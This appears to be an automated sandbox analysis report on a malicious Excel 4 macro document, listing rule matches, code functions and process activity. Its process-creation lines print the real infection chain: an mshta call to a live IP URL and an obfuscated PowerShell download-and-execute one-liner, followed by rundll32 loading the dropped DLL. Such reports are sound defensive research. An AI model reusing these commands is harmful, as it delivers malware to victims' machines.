                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002364F110_2_002364F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002288F410_2_002288F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002244FA10_2_002244FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023ACD310_2_0023ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226ED610_2_00226ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D8D710_2_0023D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002404DE10_2_002404DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002268DE10_2_002268DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022472E10_2_0022472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230D3310_2_00230D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023FF3110_2_0023FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C30910_2_0022C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BD0F10_2_0022BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022911A10_2_0022911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AB6610_2_0022AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238D7110_2_00238D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022777B10_2_0022777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00233D4110_2_00233D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023094610_2_00230946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BB4B10_2_0022BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022194C10_2_0022194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023275310_2_00232753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022195010_2_00221950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A15610_2_0023A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00234B5610_2_00234B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F15410_2_0022F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240D5B10_2_00240D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222FA110_2_00222FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002341A710_2_002341A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002399AA10_2_002399AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C9A910_2_0023C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00223FB810_2_00223FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227B8210_2_00227B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023918610_2_00239186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C38F10_2_0023C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F58F10_2_0022F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022FD8C10_2_0022FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024199310_2_00241993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221F9B10_2_00221F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00232BF610_2_00232BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EBFF10_2_0023EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237BCA10_2_00237BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D3C810_2_0023D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CFCE10_2_0022CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002345CD10_2_002345CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B970011_2_001B9700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C5CF911_2_001C5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C504011_2_001C5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C109E11_2_001C109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B608311_2_001B6083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B70ED11_2_001B70ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B911A11_2_001B911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CA15611_2_001CA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF15411_2_001BF154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C918611_2_001C9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C41A711_2_001C41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BE24311_2_001BE243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C026B11_2_001C026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C129C11_2_001C129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BC30911_2_001BC309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CB39111_2_001CB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CC38F11_2_001CC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD3C811_2_001CD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BB41A11_2_001BB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C542E11_2_001C542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CA42911_2_001CA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D146E11_2_001D146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CE49811_2_001CE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C04B811_2_001C04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C74DD11_2_001C74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D04DE11_2_001D04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B44FA11_2_001B44FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C64F111_2_001C64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C351211_2_001C3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF58F11_2_001BF58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C45CD11_2_001C45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C561F11_2_001C561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C363D11_2_001C363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B865011_2_001B8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D367211_2_001D3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B472E11_2_001B472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C275311_2_001C2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B777B11_2_001B777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B283011_2_001B2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C183111_2_001C1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BB82111_2_001BB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BC85011_2_001BC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BE86A11_2_001BE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C686411_2_001C6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D086711_2_001D0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B68DE11_2_001B68DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD8D711_2_001CD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B88F411_2_001B88F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF93D11_2_001BF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B195011_2_001B1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B194C11_2_001B194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C094611_2_001C0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D199311_2_001D1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CC9A911_2_001CC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C99AA11_2_001C99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6A1F11_2_001B6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BCA4311_2_001BCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B9A7D11_2_001B9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D1B5411_2_001D1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C4B5611_2_001C4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BBB4B11_2_001BBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BAB6611_2_001BAB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7B8211_2_001B7B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C7BCA11_2_001C7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CEBFF11_2_001CEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C2BF611_2_001C2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6C2911_2_001B6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BEC9B11_2_001BEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CCC8911_2_001CCC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CACD311_2_001CACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BBD0F11_2_001BBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C0D3311_2_001C0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D0D5B11_2_001D0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C3D4111_2_001C3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C8D7111_2_001C8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8D9511_2_001B8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BFD8C11_2_001BFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BAE9A11_2_001BAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CEE9411_2_001CEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CBE8C11_2_001CBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6ED611_2_001B6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CFF3111_2_001CFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B1F9B11_2_001B1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B3FB811_2_001B3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B2FA111_2_001B2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BCFCE11_2_001BCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00785CF912_2_00785CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007770ED12_2_007770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007874DD12_2_007874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007804B812_2_007804B8
                            Source: 54C4.tmp.0.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process Stats: CPU usage > 98%
                            Source: DETAILS-145.xls, Macro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_0077C67D DeleteService,12_2_0077C67D
                            Source: DETAILS-145.xls, type: SAMPLE, Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: DETAILS-145.xls, type: SAMPLE, Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED, Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED, Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 100359C1 appears 46 times
                            Source: DETAILS-145.xls, OLE indicator, VBA macros: true
                            Source: DETAILS-145.xls.0.dr, OLE indicator, VBA macros: true
                            Source: classification engine, Classification label: mal100.troj.expl.evad.winXLS@29/9@2/36
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
                            Source: DETAILS-145.xls, OLE indicator, Workbook stream: true
                            Source: DETAILS-145.xls.0.dr, OLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: DETAILS-145.xls, ReversingLabs: Detection: 34%
                            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\mshta.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
                            Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE44.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: 54C4.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029408CA push 8B49024Bh; iretd 4_3_029408CF
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029400BC push 8B49024Bh; iretd 4_3_029400C2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017114C push ds; ret 9_2_0017114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001715F5 push cs; retf 9_2_001715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022114C push ds; ret 10_2_0022114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002215F5 push cs; retf 10_2_002215FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B114C push ds; ret 11_2_001B114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B15F5 push cs; retf 11_2_001B15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077114C push ds; ret 12_2_0077114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007715F5 push cs; retf 12_2_007715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F114C push ds; ret 14_2_005F114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F15F5 push cs; retf 14_2_005F15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D114C push ds; ret 15_2_001D114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D15F5 push cs; retf 15_2_001D15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8f55d should be: 0x94fc5
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1496Thread sleep time: -180000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32031
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
